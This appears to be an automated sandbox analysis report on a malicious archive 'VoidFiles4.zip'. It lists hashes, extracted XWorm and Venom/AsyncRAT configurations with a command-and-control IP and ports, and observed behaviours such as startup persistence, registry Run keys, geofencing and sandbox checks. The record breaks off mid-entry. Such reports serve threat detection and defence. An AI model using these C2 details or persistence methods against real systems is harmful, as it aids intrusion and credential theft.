Analysis
-
max time kernel
978s -
max time network
994s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
27-12-2023 15:35
General
-
Target
VoidFiles4.zip
-
Size
661.1MB
-
MD5
e03ec64a5d231195443ac83b2001b954
-
SHA1
48d7873114da7e67a1e90146d6dcdf79157ce29c
-
SHA256
98287b8ebb776856273aee94a611b02d31b3f645c7c88bfa44779883d01020a6
-
SHA512
02c733532f941cfb8ce3343a433b13547cf0fac60b827003bc4a7bf71b7a55d8235f38e0cef0c13b10814c9d6a293c69dab16f2dd9aa3bf92377b37ac3314fa9
-
SSDEEP
12582912:OC62QueGfBSPQ8ihONgrdAqFBjxU1ZIOU09mJjK5W19ITTCC7DIreyElxIDr1Li3:OZ3kSPQ8GOQPBjxU1vdAOK9SeCCQe31I
Malware Config
Extracted
xworm
3.1
46.105.147.140:7000
-
Install_directory
%AppData%
-
install_file
USB.exe
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
newguys
46.105.147.140:1602
exjdbhvmrzsekzqd
-
delay
1
-
install
false
-
install_file
svchost
-
install_folder
%AppData%
Signatures
-
Detect Xworm Payload 3 IoCs
resource yara_rule behavioral1/memory/760-795-0x000001DFB2B70000-0x000001DFB2B8A000-memory.dmp family_xworm behavioral1/memory/4360-820-0x0000021EF19E0000-0x0000021EF19F0000-memory.dmp family_xworm behavioral1/memory/4360-822-0x0000021EF19E0000-0x0000021EF19F0000-memory.dmp family_xworm -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Async RAT payload 1 IoCs
resource yara_rule behavioral1/memory/2452-958-0x000002087BA00000-0x000002087BA18000-memory.dmp asyncrat -
Checks computer location settings 2 TTPs 12 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation download_client_files.bat.exe Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation startup_str_933.bat.exe Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation vcredist2015_2017_2019_2022_x86.exe Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation vcredist2015_2017_2019_2022_x64.exe Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation download_client_files.bat.exe Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation startup_str_933.bat.exe Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation startup_str_933.bat.exe Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation wmvwjn.bat.exe Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation startup_str_933.bat.exe -
Drops startup file 4 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\game_start.exe game_start.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\game_start.exe game_start.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\game_start.exe game_start.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\game_start.exe game_start.exe -
Executes dropped EXE 25 IoCs
pid Process 3716 download_client_files.bat.exe 760 startup_str_933.bat.exe 768 wmvwjn.bat.exe 2452 startup_str_806.bat.exe 4520 startup_str_933.bat.exe 3552 download_game_files.bat.exe 3748 startup_str_933.bat.exe 5032 startup_str_933.bat.exe 5096 startup_str_933.bat.exe 1760 startup_str_933.bat.exe 1048 startup_str_933.bat.exe 3168 startup_str_933.bat.exe 5552 install.exe 4520 install.exe 4684 Setup.exe 5752 Setup.exe 5956 startup_str_933.bat.exe 6032 vcredist2015_2017_2019_2022_x86.exe 5180 VC_redist.x86.exe 5020 vcredist2015_2017_2019_2022_x64.exe 1932 VC_redist.x64.exe 1892 download_client_files.bat.exe 3800 download_game_files.bat.exe 3624 startup_str_288.bat.exe 5960 startup_str_933.bat.exe -
Loads dropped DLL 64 IoCs
pid Process 3272 game_start.exe 3272 game_start.exe 3272 game_start.exe 3272 game_start.exe 3272 game_start.exe 3272 game_start.exe 3272 game_start.exe 3272 game_start.exe 3272 game_start.exe 3272 game_start.exe 3272 game_start.exe 3272 game_start.exe 3272 game_start.exe 3272 game_start.exe 3272 game_start.exe 3272 game_start.exe 3272 game_start.exe 3272 game_start.exe 3272 game_start.exe 3272 game_start.exe 3272 game_start.exe 3272 game_start.exe 3272 game_start.exe 3272 game_start.exe 3272 game_start.exe 3272 game_start.exe 3272 game_start.exe 3272 game_start.exe 3272 game_start.exe 3272 game_start.exe 3272 game_start.exe 3272 game_start.exe 3272 game_start.exe 3272 game_start.exe 3272 game_start.exe 3272 game_start.exe 3272 game_start.exe 3272 game_start.exe 3272 game_start.exe 3272 game_start.exe 3272 game_start.exe 3272 game_start.exe 3272 game_start.exe 1220 game_start.exe 1220 game_start.exe 1220 game_start.exe 1220 game_start.exe 1220 game_start.exe 1220 game_start.exe 1220 game_start.exe 1220 game_start.exe 1220 game_start.exe 1220 game_start.exe 1220 game_start.exe 1220 game_start.exe 1220 game_start.exe 1220 game_start.exe 1220 game_start.exe 1220 game_start.exe 1220 game_start.exe 1220 game_start.exe 1220 game_start.exe 1220 game_start.exe 1220 game_start.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 9 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" vcredist2005_x86.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" vcredist2005_x64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\{9dff3540-fc85-4ed5-ac84-9e3c7fd8bece} = "\"C:\\ProgramData\\Package Cache\\{9dff3540-fc85-4ed5-ac84-9e3c7fd8bece}\\vcredist_x86.exe\" /burn.runonce" vcredist2013_x86.exe Set value (str) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\startup_str_933 = "C:\\Users\\Admin\\AppData\\Roaming\\startup_str_933.bat" startup_str_933.bat.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f} = "\"C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe\" /burn.log.append \"C:\\Users\\Admin\\AppData\\Local\\Temp\\dd_vcredist_x86_20231227160056.log\" /passive /norestart ignored /burn.runonce" vcredist2012_x86.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6} = "\"C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe\" /burn.log.append \"C:\\Users\\Admin\\AppData\\Local\\Temp\\dd_vcredist_amd64_20231227160057.log\" /passive /norestart ignored /burn.runonce" vcredist2012_x64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\{042d26ef-3dbe-4c25-95d3-4c1b11b235a7} = "\"C:\\ProgramData\\Package Cache\\{042d26ef-3dbe-4c25-95d3-4c1b11b235a7}\\vcredist_x64.exe\" /burn.runonce" vcredist2013_x64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\{2cfeba4a-21f8-4ea7-9927-c5a5c6f13cc9} = "\"C:\\ProgramData\\Package Cache\\{2cfeba4a-21f8-4ea7-9927-c5a5c6f13cc9}\\VC_redist.x86.exe\" /burn.runonce" VC_redist.x86.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\{1de5e707-82da-4db6-b810-5d140cc4cbb3} = "\"C:\\ProgramData\\Package Cache\\{1de5e707-82da-4db6-b810-5d140cc4cbb3}\\VC_redist.x64.exe\" /burn.runonce" VC_redist.x64.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\S: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 20 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 562 api.ipify.org 573 api.ipify.org 576 api.ipify.org 596 api.ipify.org 395 ip-api.com 404 api.ipify.org 448 api.ipify.org 565 api.ipify.org 407 api.ipify.org 426 api.ipify.org 387 api.ipify.org 428 api.ipify.org 444 api.ipify.org 382 api.ipify.org 386 api.ipify.org 589 api.ipify.org 599 api.ipify.org 602 api.ipify.org 433 api.ipify.org 581 api.ipify.org -
Drops file in System32 directory 64 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\mfc120fra.dll msiexec.exe File created C:\Windows\system32\mfc120jpn.dll msiexec.exe File opened for modification C:\Windows\SysWOW64\vccorlib140.dll msiexec.exe File opened for modification C:\Windows\SysWOW64\mfc140chs.dll msiexec.exe File opened for modification C:\Windows\system32\mfc120enu.dll msiexec.exe File opened for modification C:\Windows\SysWOW64\mfc140esn.dll msiexec.exe File opened for modification C:\Windows\SysWOW64\vcamp120.dll msiexec.exe File created C:\Windows\system32\msvcp140_codecvt_ids.dll msiexec.exe File opened for modification C:\Windows\SysWOW64\msvcr100.dll msiexec.exe File opened for modification C:\Windows\system32\mfc100ita.dll msiexec.exe File created C:\Windows\SysWOW64\mfcm120u.dll msiexec.exe File opened for modification C:\Windows\system32\msvcr120.dll msiexec.exe File opened for modification C:\Windows\system32\vcamp120.dll msiexec.exe File created C:\Windows\system32\mfc140jpn.dll msiexec.exe File opened for modification C:\Windows\system32\mfc140jpn.dll msiexec.exe File created C:\Windows\system32\mfc140esn.dll msiexec.exe File opened for modification C:\Windows\SysWOW64\atl100.dll msiexec.exe File opened for modification C:\Windows\system32\vccorlib120.dll msiexec.exe File opened for modification C:\Windows\SysWOW64\mfc140kor.dll msiexec.exe File opened for modification C:\Windows\SysWOW64\mfc120chs.dll msiexec.exe File opened for modification C:\Windows\SysWOW64\mfc120enu.dll msiexec.exe File created C:\Windows\system32\vcamp140.dll msiexec.exe File opened for modification C:\Windows\SysWOW64\mfc100enu.dll msiexec.exe File opened for modification C:\Windows\SysWOW64\vcomp140.dll msiexec.exe File created C:\Windows\system32\mfc140ita.dll msiexec.exe File created C:\Windows\system32\msvcr120.dll msiexec.exe File created C:\Windows\system32\vccorlib120.dll msiexec.exe File created C:\Windows\SysWOW64\mfc140esn.dll msiexec.exe File opened for modification C:\Windows\SysWOW64\mfc100esn.dll msiexec.exe File created C:\Windows\SysWOW64\mfc120ita.dll msiexec.exe File created C:\Windows\SysWOW64\mfc120rus.dll msiexec.exe File opened for modification C:\Windows\system32\mfc140u.dll msiexec.exe File opened for modification C:\Windows\system32\mfc100enu.dll msiexec.exe File created C:\Windows\SysWOW64\mfc140.dll msiexec.exe File created C:\Windows\SysWOW64\mfc140enu.dll msiexec.exe File opened for modification C:\Windows\system32\mfc140esn.dll msiexec.exe File opened for modification C:\Windows\SysWOW64\mfc100u.dll msiexec.exe File opened for modification C:\Windows\system32\mfc120fra.dll msiexec.exe File created C:\Windows\system32\vcruntime140_1.dll msiexec.exe File opened for modification C:\Windows\system32\mfcm120.dll msiexec.exe File opened for modification C:\Windows\SysWOW64\vcamp140.dll msiexec.exe File opened for modification C:\Windows\system32\mfc140deu.dll msiexec.exe File created C:\Windows\system32\mfc120kor.dll msiexec.exe File created C:\Windows\system32\mfc140cht.dll msiexec.exe File opened for modification C:\Windows\system32\mfcm100.dll msiexec.exe File opened for modification C:\Windows\SysWOW64\mfcm120u.dll msiexec.exe File created C:\Windows\system32\mfc120fra.dll msiexec.exe File created C:\Windows\system32\mfcm120u.dll msiexec.exe File opened for modification C:\Windows\system32\msvcp140_2.dll msiexec.exe File created C:\Windows\system32\mfc140kor.dll msiexec.exe File opened for modification C:\Windows\system32\vcruntime140_1.dll msiexec.exe File created C:\Windows\SysWOW64\mfcm120.dll msiexec.exe File created C:\Windows\SysWOW64\msvcp140_2.dll msiexec.exe File created C:\Windows\SysWOW64\vcruntime140.dll msiexec.exe File opened for modification C:\Windows\system32\vcomp100.dll msiexec.exe File created C:\Windows\SysWOW64\mfc120esn.dll msiexec.exe File opened for modification C:\Windows\SysWOW64\msvcp140.dll msiexec.exe File opened for modification C:\Windows\SysWOW64\mfc100deu.dll msiexec.exe File opened for modification C:\Windows\SysWOW64\mfc100rus.dll msiexec.exe File opened for modification C:\Windows\system32\atl100.dll msiexec.exe File opened for modification C:\Windows\system32\mfc120jpn.dll msiexec.exe File opened for modification C:\Windows\SysWOW64\mfcm140.dll msiexec.exe File created C:\Windows\system32\msvcp140_1.dll msiexec.exe File opened for modification C:\Windows\system32\mfc140enu.dll msiexec.exe -
Drops file in Program Files directory 6 IoCs
description ioc Process File created \??\c:\Program Files\Common Files\Microsoft Shared\VC\msdia90.dll msiexec.exe File created C:\Program Files (x86)\Common Files\Microsoft Shared\VC\msdia80.dll msiexec.exe File created C:\Program Files (x86)\Common Files\Microsoft Shared\VC\amd64\msdia80.dll msiexec.exe File opened for modification \??\c:\Program Files (x86)\Common Files\Microsoft Shared\VC\msdia90.dll msiexec.exe File created \??\c:\Program Files (x86)\Common Files\Microsoft Shared\VC\msdia90.dll msiexec.exe File opened for modification \??\c:\Program Files\Common Files\Microsoft Shared\VC\msdia90.dll msiexec.exe -
Drops file in Windows directory 64 IoCs
description ioc Process File opened for modification C:\Windows\Installer\$PatchCache$\Managed\44DB0475D85BA123FA0CD6D35465DDC6\12.0.40660\F_CENTRAL_mfc120jpn_x64 msiexec.exe File created C:\Windows\Installer\e63f950.msi msiexec.exe File opened for modification C:\Windows\Installer\$PatchCache$\Managed\44DB0475D85BA123FA0CD6D35465DDC6\12.0.40660\F_CENTRAL_mfc120enu_x64 msiexec.exe File opened for modification C:\Windows\Installer\e63f93e.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI12CE.tmp msiexec.exe File opened for modification C:\Windows\WinSxS\InstallTemp\20231227160046112.1 msiexec.exe File opened for modification C:\Windows\WinSxS\InstallTemp\20231227160046127.0 msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20231227160046112.0\8.0.50727.6195.policy msiexec.exe File opened for modification C:\Windows\Installer\MSIDAAC.tmp msiexec.exe File opened for modification C:\Windows\Installer\$PatchCache$\Managed\8520DAD7C5154DD39846DB1714990E7F\12.0.40660\F_CENTRAL_mfc120enu_x86 msiexec.exe File created C:\Windows\Installer\e63f963.msi msiexec.exe File created C:\Windows\Installer\$PatchCache$\Managed\44DB0475D85BA123FA0CD6D35465DDC6\12.0.40660\F_CENTRAL_mfc120rus_x64 msiexec.exe File created C:\Windows\Installer\e63f9d5.msi msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20231227160024698.0\x86_Microsoft.VC80.OpenMP_1fc8b3b9a1e18e3b_8.0.50727.6195_x-ww_452bf920.manifest msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20231227160024745.1\8.0.50727.6195.cat msiexec.exe File created C:\Windows\Installer\$PatchCache$\Managed\44DB0475D85BA123FA0CD6D35465DDC6\12.0.40660\F_CENTRAL_mfc120jpn_x64 msiexec.exe File created C:\Windows\Installer\SourceHash{C31777DB-51C1-4B19-9F80-38EF5C1D7C89} msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20231227160045893.0\amd64_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.6195_x-ww_d6cffeda.cat msiexec.exe File opened for modification C:\Windows\WinSxS\InstallTemp\20231227160046096.0 msiexec.exe File opened for modification C:\Windows\Installer\e63f910.msi msiexec.exe File opened for modification C:\Windows\Installer\$PatchCache$\Managed\12B8D03ED28D112328CCF0A0D541598E\12.0.40660\F_CENTRAL_vcamp120_x86 msiexec.exe File opened for modification C:\Windows\Installer\MSIE210.tmp msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20231227160024636.0\mfc80JPN.dll msiexec.exe File opened for modification C:\Windows\WinSxS\InstallTemp\20231227160024558.0 msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20231227160046127.0\8.0.50727.6195.cat msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20231227160045908.0\msvcr80.dll msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20231227160046033.0\mfc80DEU.dll msiexec.exe File opened for modification C:\Windows\WinSxS\InstallTemp\20231227160046112.0 msiexec.exe File opened for modification C:\Windows\Installer\$PatchCache$\Managed\44DB0475D85BA123FA0CD6D35465DDC6 msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20231227160024636.0\mfc80DEU.dll msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20231227160046033.0\mfc80CHS.dll msiexec.exe File opened for modification C:\Windows\Installer\$PatchCache$\Managed\8520DAD7C5154DD39846DB1714990E7F\12.0.40660\F_CENTRAL_mfc120_x86 msiexec.exe File created C:\Windows\Installer\$PatchCache$\Managed\8520DAD7C5154DD39846DB1714990E7F\CacheSize.txt msiexec.exe File opened for modification C:\Windows\Installer\$PatchCache$\Managed\44DB0475D85BA123FA0CD6D35465DDC6\12.0.40660\F_CENTRAL_mfc120esn_x64 msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20231227160024511.0\x86_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.6195_x-ww_a4c618fa.manifest msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20231227160046033.0\mfc80CHT.dll msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20231227160046127.0\8.0.50727.6195.policy msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20231227160024511.0\x86_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.6195_x-ww_a4c618fa.cat msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20231227160045908.0\msvcm80.dll msiexec.exe File created C:\Windows\Installer\e63f93e.msi msiexec.exe File created C:\Windows\Installer\SourceHash{53CF6934-A98D-3D84-9146-FC4EDF3D5641} msiexec.exe File opened for modification C:\Windows\Installer\$PatchCache$\Managed\CE6380BC270BD863282B3D74B09F7570 msiexec.exe File created C:\Windows\Installer\$PatchCache$\Managed\44DB0475D85BA123FA0CD6D35465DDC6\12.0.40660\F_CENTRAL_mfc120_x64 msiexec.exe File opened for modification C:\Windows\Installer\$PatchCache$\Managed\44DB0475D85BA123FA0CD6D35465DDC6\12.0.40660\F_CENTRAL_mfc120kor_x64 msiexec.exe File created C:\Windows\Installer\SourceHash{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028} msiexec.exe File created C:\Windows\Installer\$PatchCache$\Managed\12B8D03ED28D112328CCF0A0D541598E\12.0.40660\F_CENTRAL_msvcr120_x86 msiexec.exe File opened for modification C:\Windows\Installer\$PatchCache$\Managed\8520DAD7C5154DD39846DB1714990E7F\12.0.40660\F_CENTRAL_mfc120cht_x86 msiexec.exe File created C:\Windows\Installer\$PatchCache$\Managed\CE6380BC270BD863282B3D74B09F7570\12.0.40660\F_CENTRAL_vcamp120_x64 msiexec.exe File created C:\Windows\Installer\$PatchCache$\Managed\44DB0475D85BA123FA0CD6D35465DDC6\12.0.40660\F_CENTRAL_mfc120fra_x64 msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20231227160046127.1\8.0.50727.6195.policy msiexec.exe File created C:\Windows\Installer\$PatchCache$\Managed\12B8D03ED28D112328CCF0A0D541598E\12.0.40660\F_CENTRAL_vcomp120_x86 msiexec.exe File created C:\Windows\Installer\e63f914.msi msiexec.exe File created C:\Windows\Installer\e63f920.msp msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20231227160024558.0\mfcm80u.dll msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20231227160045955.0\mfc80.dll msiexec.exe File opened for modification C:\Windows\Installer\$PatchCache$\Managed\CE6380BC270BD863282B3D74B09F7570\CacheSize.txt msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20231227160045893.0\amd64_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.6195_x-ww_d6cffeda.manifest msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20231227160046033.0\mfc80KOR.dll msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20231227160024636.0\mfc80ITA.dll msiexec.exe File opened for modification C:\Windows\Installer\$PatchCache$\Managed\12B8D03ED28D112328CCF0A0D541598E msiexec.exe File opened for modification C:\Windows\Installer\$PatchCache$\Managed\8520DAD7C5154DD39846DB1714990E7F\12.0.40660\F_CENTRAL_mfc120fra_x86 msiexec.exe File opened for modification C:\Windows\Installer\$PatchCache$\Managed\8520DAD7C5154DD39846DB1714990E7F\12.0.40660\F_CENTRAL_mfc120jpn_x86 msiexec.exe File created C:\Windows\Installer\$PatchCache$\Managed\8520DAD7C5154DD39846DB1714990E7F\12.0.40660\F_CENTRAL_mfcm120_x86 msiexec.exe File opened for modification C:\Windows\Installer\$PatchCache$\Managed\CE6380BC270BD863282B3D74B09F7570\12.0.40660\F_CENTRAL_vcomp120_x64 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 8 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 00000000040000005cf4f6141e81f6580000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff0000000027010100000800005cf4f6140000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff0000000007000100006809005cf4f614000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d5cf4f614000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000005cf4f61400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe -
Checks processor information in registry 2 TTPs 29 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Setup.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wermgr.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried 